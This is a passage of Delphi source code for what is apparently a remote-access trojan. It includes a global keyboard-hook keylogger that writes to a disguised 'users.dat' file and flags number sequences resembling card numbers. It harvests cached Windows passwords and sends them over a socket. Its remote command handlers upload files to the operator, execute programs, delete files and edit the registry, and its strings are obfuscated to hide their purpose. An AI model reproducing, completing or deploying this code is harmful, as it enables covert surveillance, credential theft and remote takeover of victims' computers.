Dec(FDSet.fd_count); Break; end; Inc(I); end; end; function FD_ISSET(Socket: TSocket; var FDSet: TFDSet): Boolean; begin Result := __WSAFDIsSet(Socket, FDSet); end; procedure FD_SET(Socket: TSocket; var FDSet: TFDSet); begin if FDSet.fd_count < FD_SETSIZE then begin FDSet.fd_array[FDSet.fd_count] := Socket; Inc(FDSet.fd_count); end; end; procedure FD_ZERO(var FDSet: TFDSet); begin FDSet.fd_count := 0; end; //=== stuff function IntToStr(A:Integer):string; begin Str(A,Result); end; function StrToInt(const S: string): Integer; var E: Integer; begin Val(S, Result, E); if E <> 0 then E:=0;//ConvertErrorFmt(SInvalidInteger, [S]); end; procedure AppMsg(Ms:PChar); begin MessageBox(Handle,Ms,'Error',0); end; //=== Cleanup and stop the program === procedure ShutDownServer; begin closesocket(Server); WSACleanup; // UnRegisterClass(lpzClassName,hInst); // Halt; end; //=== Process Messages === procedure ProcessMessages; begin while GetMessage(Msg2,0,0,0) do begin TranslateMessage(Msg2); DispatchMessage(Msg2); end; end; //=== Socket things ===== //=== Send a String #0 === procedure TSock.WriteString(wParam:word;Buff:PChar); begin send(wParam,Buff^,Length(Buff),0); end; //=== Send Buffer === function TSock.WriteData(wParam:word;Buff:pointer;Len:longInt):LongInt; begin Result:=send(wParam,Buff^,Len,0); end; //=== Process OnAccept === procedure TSock.OnServerAccept(wParam,lParam:longInt); begin accept(Server,nil,nil); end; //=== Process OnClose === procedure TSock.OnServerClose(wParam,lParam:longInt); begin //nothing end; function GetLocalHostName: string; var szHostName: array[0..128] of char; begin if gethostname(szHostName, 128) = 0 then Result:= szHostName; end; //======= sysutils ========= function StrPas(Str: PChar): string; begin Result := Str; end; function StrLen(Str: PChar): Cardinal; assembler; asm MOV EDX,EDI MOV EDI,EAX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB MOV EAX,0FFFFFFFEH SUB EAX,ECX MOV EDI,EDX end; function StrCopy(Dest, Source: PChar): PChar; assembler; asm PUSH EDI PUSH ESI MOV ESI,EAX MOV EDI,EDX MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB NOT ECX MOV EDI,ESI MOV ESI,EDX MOV EDX,ECX MOV EAX,EDI SHR ECX,2 REP MOVSD MOV ECX,EDX AND ECX,3 REP MOVSB POP ESI POP EDI end; function StrScan(Str: PChar; Chr: Char): PChar; assembler; asm PUSH EDI PUSH EAX MOV EDI,Str MOV ECX,0FFFFFFFFH XOR AL,AL REPNE SCASB NOT ECX POP EDI MOV AL,Chr REPNE SCASB MOV EAX,0 JNE @@1 MOV EAX,EDI DEC EAX @@1: POP EDI end; function DiskSize(Drive: Byte): Integer; var RootPath: array[0..4] of Char; RootPtr: PChar; SectorsPerCluster, BytesPerSector, FreeClusters, TotalClusters: Integer; begin RootPtr := nil; if Drive > 0 then begin StrCopy(RootPath, 'A:\'); RootPath[0] := Char(Drive + $40); RootPtr := RootPath; end; if GetDiskFreeSpace(RootPtr, SectorsPerCluster, BytesPerSector, FreeClusters, TotalClusters) then Result := SectorsPerCluster * BytesPerSector * TotalClusters else Result := -1; end; function DeleteFile(const FileName: string): Boolean; begin Result := Windows.DeleteFile(PChar(FileName)); end; function FileAge(const FileName: string): Integer; var Handle: THandle; FindData: TWin32FindData; LocalFileTime: TFileTime; begin Handle := FindFirstFile(PChar(FileName), FindData); if Handle <> INVALID_HANDLE_VALUE then begin Windows.FindClose(Handle); if (FindData.dwFileAttributes and FILE_ATTRIBUTE_DIRECTORY) = 0 then begin FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); if FileTimeToDosDateTime(LocalFileTime, LongRec(Result).Hi, LongRec(Result).Lo) then Exit; end; end; Result := -1; end; function FileExists(const FileName: string): Boolean; begin Result := FileAge(FileName) <> -1; end; function ByteTypeTest(P: PChar; Index: Integer): TMbcsByteType; begin Result := mbSingleByte; if (Index = 0) then begin if P[Index] in LeadBytes then Result := mbLeadByte; end else begin if (P[Index-1] in LeadBytes) and (ByteTypeTest(P, Index-1) = mbLeadByte) then Result := mbTrailByte else if P[Index] in LeadBytes then Result := mbLeadByte; end; end; function ByteType(const S: string; Index: Integer): TMbcsByteType; begin Result := mbSingleByte; if SysLocale.FarEast then Result := ByteTypeTest(PChar(S), Index-1); end; function LastDelimiter(const Delimiters, S: string): Integer; var P: PChar; begin Result := Length(S); P := PChar(Delimiters); while Result > 0 do begin if (S[Result] <> #0) and (StrScan(P, S[Result]) <> nil) then if (ByteType(S, Result) = mbTrailByte) then Dec(Result) else Exit; Dec(Result); end; end; function ExtractFilePath(const FileName: string): string; var I: Integer; begin I := LastDelimiter('\:', FileName); Result := Copy(FileName, 1, I); end; procedure FindClose(var F: TSearchRec); begin if F.FindHandle <> INVALID_HANDLE_VALUE then Windows.FindClose(F.FindHandle); end; function FindMatchingFile(var F: TSearchRec): Integer; var LocalFileTime: TFileTime; begin with F do begin while FindData.dwFileAttributes and ExcludeAttr <> 0 do if not FindNextFile(FindHandle, FindData) then begin Result := GetLastError; Exit; end; FileTimeToLocalFileTime(FindData.ftLastWriteTime, LocalFileTime); FileTimeToDosDateTime(LocalFileTime, LongRec(Time).Hi, LongRec(Time).Lo); Size := FindData.nFileSizeLow; Attr := FindData.dwFileAttributes; Name := FindData.cFileName; end; Result := 0; end; function FindFirst(const Path: string; Attr: Integer; var F: TSearchRec): Integer; const faSpecial = faHidden or faSysFile or faVolumeID or faDirectory; begin F.ExcludeAttr := not Attr and faSpecial; F.FindHandle := FindFirstFile(PChar(Path), F.FindData); if F.FindHandle <> INVALID_HANDLE_VALUE then begin Result := FindMatchingFile(F); if Result <> 0 then FindClose(F); end else Result := GetLastError; end; function FindNext(var F: TSearchRec): Integer; begin if FindNextFile(F.FindHandle, F.FindData) then Result := FindMatchingFile(F) else Result := GetLastError; end; //=== Registry call ================ constructor TRegistry.Create; begin RootKey := HKEY_CURRENT_USER; LazyWrite := True; end; function DataTypeToRegData(Value: Integer): TRegDataType; begin if Value = REG_SZ then Result := rdString else if Value = REG_EXPAND_SZ then Result := rdExpandString else if Value = REG_DWORD then Result := rdInteger else if Value = REG_BINARY then Result := rdBinary else Result := rdUnknown; end; function RegDataToDataType(Value: TRegDataType): Integer; begin case Value of rdString: Result := REG_SZ; rdExpandString: Result := REG_EXPAND_SZ; rdInteger: Result := REG_DWORD; rdBinary: Result := REG_BINARY; else Result := REG_NONE; end; end; function TRegistry.GetDataInfo(const ValueName: string; var Value: TRegDataInfo):boolean; var DataType: Integer; begin FillChar(Value, SizeOf(TRegDataInfo), 0); Result := RegQueryValueEx(CurrentKey, PChar(ValueName), nil, @DataType, nil, @Value.DataSize) = ERROR_SUCCESS; Value.RegData := DataTypeToRegData(DataType); end; function TRegistry.GetData(const Name: string; Buffer: Pointer; BufSize: Integer; var RegData: TRegDataType): Integer; var DataType: Integer; begin DataType := REG_NONE; if RegQueryValueEx(CurrentKey, PChar(Name), nil, @DataType, PByte(Buffer), @BufSize) <> ERROR_SUCCESS then // raise ERegistryException.CreateFmt(SRegGetDataFailed, [Name]); Result := BufSize; RegData := DataTypeToRegData(DataType); end; procedure TRegistry.PutData(const Name: string; Buffer: Pointer; BufSize: Integer; RegData: TRegDataType); var DataType: Integer; begin DataType := RegDataToDataType(RegData); if RegSetValueEx(CurrentKey, PChar(Name), 0, DataType, Buffer, BufSize) <> ERROR_SUCCESS then // raise ERegistryException.CreateFmt(SRegSetDataFailed, [Name]); end; function TRegistry.GetDataSize(const ValueName: string): Integer; var Info: TRegDataInfo; begin if GetDataInfo(ValueName, Info) then Result := Info.DataSize else Result := -1; end; procedure TRegistry.WriteString(const Name, Value: string); begin PutData(Name, PChar(Value), Length(Value), rdString); end; procedure ReadError(const Name: string); begin // raise ERegistryException.CreateFmt(SInvalidRegType, [Name]); end; function TRegistry.ReadString(const Name: string): string; var Len: Integer; RegData: TRegDataType; begin Len := GetDataSize(Name); if Len > 0 then begin SetString(Result, nil, Len); GetData(Name, PChar(Result), Len, RegData); if (RegData = rdString) or (RegData = rdExpandString) then SetLength(Result, StrLen(PChar(Result))) else ReadError(Name); end else Result := ''; end; procedure TRegistry.CloseKey; begin if CurrentKey <> 0 then begin if LazyWrite then RegCloseKey(CurrentKey) else RegFlushKey(CurrentKey); FCurrentKey := 0; FCurrentPath := ''; end; end; procedure TRegistry.ChangeKey(Value: HKey; const Path: string); begin CloseKey; FCurrentKey := Value; FCurrentPath := Path; end; procedure TRegistry.SetRootKey(Value: HKEY); begin if RootKey <> Value then begin if FCloseRootKey then begin RegCloseKey(RootKey); FCloseRootKey := False; end; FRootKey := Value; CloseKey; end; end; function TRegistry.GetBaseKey(Relative: Boolean): HKey; begin if (CurrentKey = 0) or not Relative then Result := RootKey else Result := CurrentKey; end; function IsRelative(const Value: string): Boolean; begin Result := not ((Value <> '') and (Value[1] = '\')); end; function TRegistry.OpenKey(const Key: string; CanCreate: Boolean): Boolean; var TempKey: HKey; S: string; Disposition: Integer; Relative: Boolean; begin S := Key; Relative := IsRelative(S); if not Relative then Delete(S, 1, 1); TempKey := 0; if not CanCreate or (S = '') then begin Result := RegOpenKeyEx(GetBaseKey(Relative), PChar(S), 0, KEY_ALL_ACCESS, TempKey) = ERROR_SUCCESS; end else Result := RegCreateKeyEx(GetBaseKey(Relative), PChar(S), 0, nil, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, nil, TempKey, @Disposition) = ERROR_SUCCESS; if Result then begin if (CurrentKey <> 0) and Relative then S := CurrentPath + '\' + S; ChangeKey(TempKey, S); end; end; destructor TRegistry.Destroy; begin CloseKey; inherited; end; //== Allocate windows === const InstanceCount = 313; Type TWndMethod = procedure(var Message: TMessage) of object; type PObjectInstance = ^TObjectInstance; TObjectInstance = packed record Code: Byte; Offset: Integer; case Integer of 0: (Next: PObjectInstance); 1: (Method: TWndMethod); end; type PInstanceBlock = ^TInstanceBlock; TInstanceBlock = packed record Next: PInstanceBlock; Code: array[1..2] of Byte; WndProcPtr: Pointer; Instances: array[0..InstanceCount] of TObjectInstance; end; var InstBlockList: PInstanceBlock; InstFreeList: PObjectInstance; function StdWndProc(Window: HWND; Message, WParam: Longint; LParam: Longint): Longint; stdcall; assembler; asm XOR EAX,EAX PUSH EAX PUSH LParam PUSH WParam PUSH Message MOV EDX,ESP MOV EAX,[ECX].Longint[4] CALL [ECX].Pointer ADD ESP,12 POP EAX end; function CalcJmpOffset(Src, Dest: Pointer): Longint; begin Result := Longint(Dest) - (Longint(Src) + 5); end; function MakeObjectInstance(Method: TWndMethod): Pointer; const BlockCode: array[1..2] of Byte = ( $59, { POP ECX } $E9); { JMP StdWndProc } PageSize = 4096; var Block: PInstanceBlock; Instance: PObjectInstance; begin if InstFreeList = nil then begin Block := VirtualAlloc(nil, PageSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Block^.Next := InstBlockList; Move(BlockCode, Block^.Code, SizeOf(BlockCode)); Block^.WndProcPtr := Pointer(CalcJmpOffset(@Block^.Code[2], @StdWndProc)); Instance := @Block^.Instances; repeat Instance^.Code := $E8; { CALL NEAR PTR Offset } Instance^.Offset := CalcJmpOffset(Instance, @Block^.Code); Instance^.Next := InstFreeList; InstFreeList := Instance; Inc(Longint(Instance), SizeOf(TObjectInstance)); until Longint(Instance) - Longint(Block) >= SizeOf(TInstanceBlock); InstBlockList := Block; end; Result := InstFreeList; Instance := InstFreeList; InstFreeList := Instance^.Next; Instance^.Method := Method; end; { Free an object instance } procedure FreeObjectInstance(ObjectInstance: Pointer); begin if ObjectInstance <> nil then begin PObjectInstance(ObjectInstance)^.Next := InstFreeList; InstFreeList := ObjectInstance; end; end; var UtilWindowClass: TWndClass = ( style: 0; lpfnWndProc: @DefWindowProc; cbClsExtra: 0; cbWndExtra: 0; hInstance: 0; hIcon: 0; hCursor: 0; hbrBackground: 0; lpszMenuName: nil; lpszClassName: 'TPUtilWindow'); function AllocateHWnd(Method: TWndMethod): HWND; var TempClass: TWndClass; ClassRegistered: Boolean; begin UtilWindowClass.hInstance := HInstance; ClassRegistered := GetClassInfo(HInstance, UtilWindowClass.lpszClassName, TempClass); if not ClassRegistered or (TempClass.lpfnWndProc <> @DefWindowProc) then begin if ClassRegistered then Windows.UnregisterClass(UtilWindowClass.lpszClassName, HInstance); Windows.RegisterClass(UtilWindowClass); end; Result := CreateWindowEx(WS_EX_TOOLWINDOW, UtilWindowClass.lpszClassName, '', WS_POPUP {!0}, 0, 0, 0, 0, 0, 0, HInstance, nil); if Assigned(Method) then SetWindowLong(Result, GWL_WNDPROC, Longint(MakeObjectInstance(Method))); end; procedure DeallocateHWnd(Wnd: HWND); var Instance: Pointer; begin Instance := Pointer(GetWindowLong(Wnd, GWL_WNDPROC)); DestroyWindow(Wnd); if Instance <> @DefWindowProc then FreeObjectInstance(Instance); end; //==== Key_log========================= type PGlobalDLLData = ^TGlobalDLLData; TGlobalDLLData = record hHookHWnd: HWND; hKeyHook: HHOOK; end; const MMFileName = 'Users'; var MapHandle: THandle; GlobalData: PGlobalDLLData; tt,Logger:string; l:textfile; cc:byte; procedure OpenSharedData; var Size: integer; CreateFileMappingError: integer; begin Size := SizeOf( TGlobalDLLData ); MapHandle := CreateFileMapping( $FFFFFFFF, nil, PAGE_READWRITE, 0, Size, MMFileName ); CreateFileMappingError := GetLastError; if ( MapHandle = 0 ) then exit; GlobalData := MapViewOfFile( MapHandle, FILE_MAP_ALL_ACCESS, 0, 0, Size ); if ( GlobalData = nil ) then begin CloseHandle( MapHandle ); exit; end; if ( ( MapHandle <> 0 ) and ( CreateFileMappingError <> ERROR_ALREADY_EXISTS ) ) then begin GlobalData^.hHookHWnd := 0; GlobalData^.hKeyHook := 0; end; end; procedure CloseSharedData; begin UnmapViewOfFile( GlobalData ); CloseHandle( MapHandle ); end; //function KeyCounter( code: integer; wParam: integer; lParam: integer ): lRESULT stdcall; function KeyCounter( code: integer; wParam: integer; lParam: integer ): LRESULT; stdcall; begin OpenSharedData; Result := CallNextHookEx( GlobalData^.hKeyHook, Code, wParam, lParam ); if ( code = HC_ACTION ) then begin if ( lParam > 0 ) then begin PostMessage( GlobalData^.hHookHWnd, UM_KEYHIT, wParam, 0 ); end; Result := 0; exit; end; end; procedure KeyHook_Start( hWin: HWND ); //stdcall; begin OpenSharedData; GlobalData^.hKeyHook := SetWindowsHookEx( WH_KEYBOARD, KeyCounter, hInstance, 0 ); GlobalData^.hKeyHook := SetWindowsHookEx( WH_KEYBOARD, nil, hInstance, 0 ); GlobalData^.hHookHWnd := hWin; end; procedure KeyHook_Stop; //stdcall; begin OpenSharedData; UnHookWindowsHookEx( GlobalData^.hKeyHook ); CloseSharedData; end; procedure TLog.KeyIncrement( var Msg: TMessage ); const lettres: array[65..90] of Char = 'abcdefghijklmnopqrstuvwxyz'; chiffres: array[96..111] of Char = '0123456789*+ - /'; chiffres2: array[48..57] of Char = '0123456789'; var k:integer; s:string; begin k:=msg.WParam; //writeln(inttostr(k)+' : '+char(k)); if k in [96..111] then s:=chiffres[k] else if k in [65..90] then s:=lettres[k] else if k in [48..57] then s:=chiffres2[k] else if k in [112..123] then s:=#255 else if k in [33..40] then s:=#255 else if k = 0 then s:=#255 else if k > 255 then s:=#255 else if k = 16 then s:=crypt('=QKMCR9') else //<SHIFT> if k = 17 then s:=crypt('=AWVI8') else //<CTRL> if k = 18 then s:=crypt('=COP;') else //<ALT> if k = 20 then s:=crypt('=ABTV8') else //<CAPS> if k = 144 then s:=crypt('=LVI;') else //<NUM> if k = 9 then s:=crypt('=vbf;') else //<tab> if k = 8 then s:=crypt('=<') else //<> if k = 223 then s:='!' else if k = 219 then s:=')' else if k = 187 then s:='=' else if k = 221 then s:='^' else if k = 186 then s:='$' else if k = 192 then s:='? else if k = 220 then s:='*' else if k = 188 then s:=',' else if k = 190 then s:=';' else if k = 191 then s:=':' else if k = 226 then s:='<' else if k = 222 then s:='? else if k = 13 then s:='? else if k = 32 then s:=' ' else if k = 46 then s:=crypt('=ffh;') else //<del> if k = 45 then s:=crypt('=kmw;') else //<ins> s:='['+inttostr(k)+']'; logger:=logger+s; //write(s); if (s[1] in ['0'..'9']) or (s[1]=' ') or (s[1]='-') then inc(cc) else cc:=0; if (cc=13) then begin cc:=0; Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); Registre.WriteString('1','1'); Registre.Free; end; if length(logger)>200 then begin if not fileexists(systemdir+crypt(']wpawu)lh~')) then //\users.dat begin assignfile(l,systemdir+crypt(']wpawu)lh~')); //\users.dat rewrite(l); write(l,' '); closefile(l); end; assignfile(l,systemdir+crypt(']wpawu)lh~'));//\users.dat reset(l); append(l); write(l,logger); closefile(l); logger:=''; end; end; procedure TLog.LogCreate; var tyhwnd:thandle; begin cc:=0; tyhwnd := AllocateHwnd(KLog.KeyIncrement); KeyHook_Start(tyhwnd); end; procedure TLog.LogDestroy; begin KeyHook_Stop; {$I-} assignfile(l,systemdir+crypt(']wpawu)lh~')); //\users.dat reset(l); append(l); write(l,logger); closefile(l); logger:=''; {$I+} end; //=== password connection function EnumPasswordCallbackProc(pce: TPPasswordCacheEntry; pdw: cardinal) : LongBool; stdcall; var s1 : string; s2 : string; begin result:=true; SetLength(s1,pce^.cbResource); Move(pce^.abResource[0],pointer(s1)^,pce^.cbResource); s1:=pchar(s1); SetLength(s2,pce^.cbPassword); Move(pce^.abResource[pce^.cbResource],pointer(s2)^,pce^.cbPassword); s2:=pchar(s2); write(t,PChar(s1+' : '+s2+#13+#10)); end; procedure testEnumCachedPasswords; var WNetEnumCachedPasswords : function (ps: pchar; pw: word; pb: byte; proc: pointer; bdw: cardinal) : word; stdcall; mpr : cardinal; begin mpr:=LoadLibrary('mpr'); if mpr<>0 then try WNetEnumCachedPasswords:=GetProcAddress(mpr,pchar(crypt('VLfp@hreJkhdhj_qbad{grd'))); //WNetEnumCachedPasswords if @WNetEnumCachedPasswords<>nil then begin try WNetEnumCachedPasswords(nil,0,$FF,@EnumPasswordCallbackProc,0); finally end; end; finally FreeLibrary(mpr) end; end; //===windows_control procedure killprocess(prname:string); var str : pchar; h:hwnd; begin str:=@(prname)[1]; h := FindWindow(nil,str); if h <> 0 then PostMessage(h, WM_QUIT, 0, 0); end; {function childproc(h:HWND):bool;stdcall; var tempstring: array [0..255] of char; begin GetClassName(h,classe,255); if (classe=nil) or (classe=string(' ')) then exit; if classe='Edit' then begin sendmessage(h,WM_GETTEXT,255,integer(@tempstring)); if tempstring<>'' then begin writeln(tempstring); counter:=counter+1; end; if counter=2 then writeln(string(klasse)); end; if classe='TEdit' then begin sendmessage(h,WM_GETTEXT,255,integer(@tempstring)); if tempstring<>'' then begin writeln(tempstring); counter:=counter+1; end; if counter=2 then writeln(string(klasse)); end; end; function AddTopLevelWindowsToList2(h: HWND): BOOL; stdcall; begin If (GetWindowLong(h,GWL_HWNDPARENT)=0) then begin Getwindowtext(h,klasse,255); if klasse<>'' then begin counter:=0; if pos('Netscape',klasse)<>0 then counter:=1; //+ ' (' + inttostr(h) if pos('Explorer',klasse)<>0 then counter:=1; //writeln(string(klasse)); if pos('Opera',klasse)<>0 then counter:=1; end; end; if counter=1 then EnumChildWindows(h,@childproc,8); end; } function AddTopLevelWindowsToList(h: HWND): BOOL; stdcall; begin If (GetWindowLong(h,GWL_HWNDPARENT)=0) then begin Getwindowtext(h,klasse,255); if klasse<>'' then begin write(t,string(klasse)+#13+#10); end; end; end; //=== information === procedure DoPassword(wParam:longInt); var pp:string; sock:tsock; begin assignfile(t,windowsdir+'~tmp..sys'); rewrite(t); append(t); testEnumCachedPasswords; closefile(t); assignfile(t,windowsdir+'~tmp..sys'); reset(t); repeat readln(t,pp); Sock.WriteString(wParam, PChar(pp+#13+#10)); sleep(Timeout); until pp=''; closefile(t); erase(t); end; procedure DoAbout(wParam:longInt); var SI:TSystemInfo; OsVer:TOSVersionInfoA; MS:TMemoryStatus; pp:string; begin ZeroMemory(@OsVer,SizeOf(OsVer)); ZeroMemory(@Si,SizeOf(Si)); ZeroMemory(@MS,SizeOf(MS)); MS.dwLength:=SizeOf(MS); OsVer.dwOSVersionInfoSize:=SizeOf(OsVer); GetVersionEx(OsVer); GetSystemInfo(Si); GlobalMemoryStatus(MS); case Win32Platform of WINDOWS.VER_PLATFORM_WIN32_WINDOWS : pp:='95'; WINDOWS.VER_PLATFORM_WIN32s : pp:='32'; WINDOWS.VER_PLATFORM_WIN32_NT : pp:='NT'; end; Sock.WriteString(wParam, PChar( crypt('R{pp`k=')+#13+#10+ //System: WSD.szDescription+#13+#10+ crypt('NQ9$')+IntToStr(OsVer.dwMajorVersion)+'.'+IntToStr(OsVer.dwMinorVersion)+#13+#10+ //OS: crypt('own$FVR2)')+IntToStr(Si.dwNumberOfProcessors)+#13+#10+ //num CPU: crypt('BRV$')+IntToStr(Si.dwProcessorType)+#13+#10+ //CPU crypt('SCN$')+IntToStr(Round(MS.dwTotalPhys/1048576))+#13+#10+ //RAM crypt('GpfaWGJ(')+IntToStr(Round(MS.dwAvailPhys/1024))+#13+#10+ //FreeRAM crypt('Wpw$')+IntToStr(Round(MS.dwTotalVirtual/1048576))+#13+#10+ //Vrt crypt('GpfaSts(')+IntToStr(Round(MS.dwAvailVirtual/1048576))+#13+#10+ //FreeVrt crypt('R{pp`k=(')+systemdir+'\'+#13+#10+ //System: crypt('Vkm`jq=(')+windowsdir+'\'+#13+#10+ //Window: WSD.szSystemStatus+' '+pp+#13+#10+ crypt('Impp?&')+getlocalhostname+#13+#10)); //Host: end; procedure DoShowDirectory(wParam:longInt;command:String); var sss,NomDuDossier,DossierTrouve,FichierTrouve:string; attributs,Resultat:Integer; SearchRec:TSearchRec; TailleDuFichier:integer; begin attributs:=6; sock.writestring(wParam,pchar(crypt('EkqWfgi2')+#13+#10)); //DirScan: sleep(timeout); If command[length(command)]='\' then command:=copy(command,1,length(command)-1); Resultat:=FindFirst(command+'\'+'*.*',FaDirectory,SearchRec); while Resultat=0 do begin if (SearchRec.Name<>'.') and (SearchRec.Name<>'..') and ((SearchRec.Attr and faDirectory)>0) then begin DossierTrouve:=command+'\'+SearchRec.Name; NomDuDossier:=DossierTrouve; // ProcessMessages; end; if NomDuDossier<>sss then begin sleep(timeout); if NomDuDossier<>'' then NomduDossier:=NomDuDossier+'\'; sock.writestring(wParam,pchar(crypt('}F9')+NomduDossier+#13+#10)); //|D: end; sss:=NomDuDossier; Resultat:=FindNext(SearchRec); end; FindClose(SearchRec); If command[length(command)]='\' then command:=copy(command,1,length(command)-1); Resultat:=FindFirst(command+'\'+crypt('+,)'),Attributs,SearchRec); //*.* while Resultat=0 do begin //ProcessMessages; if ((SearchRec.Attr and faDirectory)<=0) then begin FichierTrouve:=command+'\'+SearchRec.Name; TailleDuFichier:=SearchRec.Size; //NomFichierComplet:=FichierTrouve; //DateHeureDuFichier:=SearchRec.Time; end; sleep(timeout); Resultat:=FindNext(SearchRec); sock.writestring(wParam,pchar(crypt('}D9')+FichierTrouve+'|'+inttostr(tailledufichier)+#13+#10)); //|F: end; FindClose(SearchRec); sleep(timeout); sock.writestring(wParam,pchar(crypt('}D9$YZo|dfWP')+#13+#10)); //|F: \\html\\ end; procedure DoStart(wParam:longInt); var ch:char; VolNameStr,Tip:String; LW:byte; Dsize,NamLen,syslen:integer; VolNameAry: array[0..255] of char; VolSer,SysFlags : DWord; begin Driv:=''; d:=0; ch:=#97; sock.WriteString(wParam, PChar(crypt('EmPpdts2')+#13+#10)); //DoStart: repeat d:=d+1; s:=ch+':\'; case getDriveType(pChar(s)) of DRIVE_FIXED: begin Tip:='0'; //Fixed HD NamLen:=255; SysLen:=255; if GetVolumeInformation(pChar(s), VolNameAry, NamLen, @VolSer, SysLen, SysFlags, nil, 0) then VolNameStr := StrPas(VolNameAry) else VolNameStr := ''; LW := ord(upcase(s[1])) - 64; DSize := DiskSize(LW); if (DSize <> -1) then DSize := disksize(LW) DIV 1024; //Driv:=Driv+'Drive: '+UpCase(Ch)+':\'+' <'+Volnamestr+'>'+'&'+Tip+'|'+IntToStr(DSize)+'|'+#13+#10; Driv:=crypt('}F9')+UpCase(Ch)+':\'+' <'+Volnamestr+'>'+'&'+Tip+'|'+IntToStr(DSize)+'|'+#13+#10; //|D: end; DRIVE_CDROM: begin Tip:='1'; //CD-ROM Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+Tip+'|0|'+#13+#10; end; DRIVE_RAMDISK: begin Tip:='2'; //RAM Disk Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+Tip+'|0|'+#13+#10; end; DRIVE_REMOVABLE: begin Tip:='3'; //Removable Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+tip+'|0|'+#13+#10; end; DRIVE_REMOTE: begin Tip:='4'; //Network Driv:=Driv+'|D:'+UpCase(Ch)+':\'+' &'+tip+'|0|'+#13+#10; end; sleep(timeout); sock.WriteString(wParam, PChar(Driv)); driv:=''; inc(ch); until d=26; sleep(timeout); sock.WriteString(wParam, PChar(crypt(']^kphj[T')+#13+#10)); //\\html\\ end; procedure DoShowLog(wParam:longInt); var f:file of byte; p:longint; begin Registre:=TRegistry.create; Registre.RootKey:=HKEY_CLASSES_ROOT; Registre.OpenKey('.aft',true); if fileexists(systemdir+crypt(']wpawu)lh~')) then //\users.dat begin assignfile(f,systemdir+crypt(']wpawu)lh~')); //\users.dat reset(f); p:=filesize(f); sock.writestring(wParam,pchar(crypt('mmd>%')+Registre.ReadString('1')+' '+s+' '+inttostr(p)+#13+#10)); //log: closefile(f); end; Registre.Free; end; procedure DoExecFile(wParam:longInt;Command:String); var R:Integer; Params:String; begin Params:=''; if Pos('&',Command)<>0 then begin Params:=Copy(Command,Pos('&',Command)+1,255); Delete(Command,Pos('&',Command),255); end; R:=ShellExecute(0,nil,PChar(Command),PChar(Params),nil,SW_NORMAL); if R<=32 then sock.WriteString(wParam, PChar(ERROR+#13+#10)) else sock.WriteString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoProxy(wParam:longInt;Command:String); begin // end; procedure DoDeleteFile(wParam:longInt;Command:String); var St:String; Found:Integer; F:TSearchRec; begin Found:=FindFirst(Command,faAnyFile, F); St:=''; while Found = 0 do begin if DeleteFile(ExtractFilePath(Command)+F.Name) then St:=St+F.Name; Found:=FindNext(F); end; sock.WriteString(wParam, PChar(crypt('Dpbw`b''n`fn7')+St+#13+#10)); //Erased files: end; procedure DoSendFile(wParam:longInt;Command:String); var {f:file of byte;} f:HFile; st:string; NumRead:Integer; p:array[1..1024] of char; OfStr:TOFStruct; FF:TSearchRec; begin f:=OpenFile(PChar(Command),OFStr,OF_READ); if f=HFILE_ERROR then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); exit; end; FindFirst(Command,faAnyFile, FF); St:=IntToStr(FF.Size); sock.WriteString(wParam, PChar(crypt('mmb`cok2')+st+'|'+#13+#10)); //loadfil: sleep(timeout); repeat ReadFile(f,P,SizeOf(P),NumRead,nil); Sleep(timeout); if sock.WriteData(wParam,@P,numread)=0 then begin _lclose(f); exit; end; until (NumRead = 0); _lclose(f); end; procedure DoReceiveFile(wParam:longInt;Command:String); begin //done; end; procedure DoRenameFile(wParam:longInt;Command:String); var Params:String; f:file; begin Params:=''; if Pos('&',Command)<>0 then begin Params:=Copy(Command,Pos('&',Command)+1,255); Delete(Command,Pos('&',Command),255); end; assignfile(f,command); if params<>'' then Rename(f,params) else exit; sock.writeString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoCreateDirectory(wParam:longInt;Command:String); var St:String; begin St:=command; MkDir(command); sock.WriteString(wParam, PChar(crypt('Bpfeqc''l`x1')+St+#13+#10)); //Create dir: end; procedure DoDeleteDirectory(wParam:longInt;Command:String); var St:String; begin St:=command; RmDir(command); sock.WriteString(wParam, PChar(crypt('Dpbw`&ca{0')+St+#13+#10)); //Erase dir: end; procedure DoWriteReg(wParam:longInt;Command:String); var Params,Params1,Params2,Params3:String; begin params:=''; params1:=''; params2:=''; params3:=''; if Pos('&',Command)<>0 then begin params:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params1:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params2:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; Params3:=Copy(Command,1,length(command)); Registre:=TRegistry.create; if strtoint(params)=0 then Registre.RootKey:=HKEY_CLASSES_ROOT; if strtoint(params)=1 then Registre.RootKey:=HKEY_CURRENT_USER; if strtoint(params)=2 then Registre.RootKey:=HKEY_LOCAL_MACHINE; if strtoint(params)=3 then Registre.RootKey:=HKEY_USERS; if strtoint(params)=4 then Registre.RootKey:=HKEY_PERFORMANCE_DATA; if strtoint(params)=5 then Registre.RootKey:=HKEY_CURRENT_CONFIG; if strtoint(params)=6 then Registre.RootKey:=HKEY_DYN_DATA; if strtoint(params)>6 then begin sock.WriteString(wParam, PChar(ERROR+#13+#10)); Registre.Free; exit; end; Registre.OpenKey(params1,true); Registre.WriteString(params2,pchar(params3)); Registre.Free; sock.WriteString(wParam, PChar(ALLDONE+#13+#10)); end; procedure DoReadReg(wParam:longInt;Command:String); var params,params1,params2:string; begin if Pos('&',Command)<>0 then begin params:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; if Pos('&',Command)<>0 then begin params1:=copy(command,1,pos('&',command)-1); Delete(Command,1,pos('&',command)); end; Params2:=Copy(Command,1,length(command)); Registre:=TRegistry.create; if strtoint(params)=0 then Registre.RootKey:=HKEY_CLASSES_ROOT; if strtoint(params)=1 then Registre.RootKey:=HKEY_CURRENT_USER; if strtoint(params)=2 then 